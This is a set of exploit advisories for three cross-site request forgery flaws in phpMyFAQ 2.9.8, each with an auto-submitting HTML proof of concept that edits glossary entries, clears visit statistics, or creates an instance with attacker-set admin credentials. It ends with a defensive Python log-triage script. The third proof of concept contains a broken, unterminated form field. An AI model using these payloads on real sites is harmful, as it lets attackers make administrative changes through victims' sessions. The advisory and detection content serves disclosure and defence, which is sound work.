phpMyFAQ version 2.9.8 is vulnerable to Cross-Site Request Forgery (CSRF).
This vulnerability allows an attacker to trick a logged-in user into performing unintended actions without their consent. Such actions could include modifying FAQ entries, changing user settings, or even administrative tasks if the victim is an administrator.
The attack works by crafting a malicious web page or link that, when visited by an authenticated user, silently sends a forged request to the phpMyFAQ application. Because the user is logged in, their browser automatically includes session cookies, making the request appear legitimate to the server.
The absence of proper CSRF tokens or other anti-CSRF mechanisms in affected requests is the underlying cause. Users are advised to upgrade to a patched version (e.g., 2.9.9 or later) to mitigate this risk.
# Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15735
PoC:
While still logged in, open another browser window:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php?action=updateglossary" method="POST">
<input type="hidden" name="id" value="1">
<input type="hidden" name="item" value="Malicious Glossary Item">
<input type="hidden" name="definition" value="This is a malicious definition.">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Some Details:
{
"Protection Mechanisms Before Patch": "There was no CSRF token validation in place for the glossary modification actions (add, update, delete). The patch introduced CSRF token checks for both POST and GET requests to ensure that only authorized sessions could perform these actions.",
"File Navigation Chain": "Public Access Entry URL -> phpmyfaq/admin/index.php -> glossary.main.php -> glossary.edit.php",
"Execution Path Constraints": "The user must be authenticated with the necessary permissions ('editglossary') to reach and interact with the glossary functionality through the 'index.php' entry point. Without proper authentication, the server redirects to the login form.",
"Request Parameters": "id, item, definition",
"Request Method": "POST",
"Request URL": "http://phpmyfaq/admin/index.php?action=updateglossary",
"Final PoC": "```\n<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=updateglossary\" method=\"POST\">\n <input type=\"hidden\" name=\"id\" value=\"1\">\n <input type=\"hidden\" name=\"item\" value=\"Malicious Glossary Item\">\n <input type=\"hidden\" name=\"definition\" value=\"This is a malicious definition.\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>document.forms[0].submit();</script>\n </body>\n</html>\n```"
}
------
# Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15734
PoC:
GET http://phpmyfaq/admin/index.php?action=clear-visits
Reproduction: While still logged in, open another browser window to access the link.
Some Details:
{
"Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
"File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
"Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
"Request Parameters": "action=clear-visits",
"Request Method": "GET",
"Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
"Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>"
}
-----
# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808
PoC:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php" method="GET">
<input type="hidden" name="action" value="ajax">
<input type="hidden" name="ajax" value="config">
<input type="hidden" name="ajaxaction" value="add_instance">
<input type="hidden" name="url" value="malicious">
<input type="hidden" name="instance" value="malicious_instance">
<input type="hidden" name="comment" value="CSRF Test">
<input type="hidden" name="email" value="
<input type="hidden" name="admin" value="attacker">
<input type="hidden" name="password" value="password123">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps to Reproduce:
1. Save the code above as poc.html.
2. Log in to phpMyFAQ, and open the file in the same browser.
3. The outcome will occur.
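Added example, not part of the original advisories or of phpMyFAQ's code: a log-triage sketch that flags the three admin requests named above when they arrive without a same-site Referer or, for GET, without a token parameter in the query string. The combined log format, the host name `phpmyfaq`, the token parameter name `csrf` and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumptions, not taken from the advisory: combined access-log format, the
# site's own host name, and "csrf" as the token parameter of a patched build.
TRUSTED_HOST, TOKEN_PARAM = "phpmyfaq", "csrf"
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"')

def sensitive_action(query):
    """Return the advisory's state-changing admin action, or None."""
    action = query.get("action", [""])[0]
    if action in ("updateglossary", "clear-visits"):
        return action
    if action == "ajax" and query.get("ajaxaction", [""])[0] == "add_instance":
        return "add_instance"
    return None

def classify(line):
    """Return (action, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query)
    action = sensitive_action(query)
    if action is None or not url.path.endswith("/admin/index.php"):
        return None
    reasons = []
    if m["referer"] in ("", "-"):      # also what a page opened from a local file sends
        reasons.append("no-referer")
    elif urlsplit(m["referer"]).hostname != TRUSTED_HOST:
        reasons.append("cross-site-referer")
    if m["method"] == "GET" and TOKEN_PARAM not in query:
        reasons.append("no-token-in-query")   # POST bodies are not in access logs
    return (action, reasons) if reasons else None

PFX = '198.51.100.7 - - [26/Oct/2024:10:00:00 +0000] '   # constructed sample lines
SAMPLE_LOG = [
    PFX + '"POST /admin/index.php?action=updateglossary HTTP/1.1" 200 512 "http://other.example/p.html" "-"',
    PFX + '"GET /admin/index.php?action=clear-visits HTTP/1.1" 200 512 "-" "-"',
    PFX + '"GET /admin/index.php?action=ajax&ajax=config&ajaxaction=add_instance HTTP/1.1" 200 9 "http://phpmyfaq/admin/" "-"',
    PFX + '"GET /admin/index.php?action=clear-visits&csrf=abc HTTP/1.1" 200 512 "http://phpmyfaq/admin/" "-"',
]

def scan(lines):
    """Return every (action, reasons) finding in an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]
```

`scan(SAMPLE_LOG)` reports the first three sample lines and passes the fourth, which carries a token and a same-site Referer. A Referer check is only a triage signal; the fix remains server-side token validation as introduced by the patch.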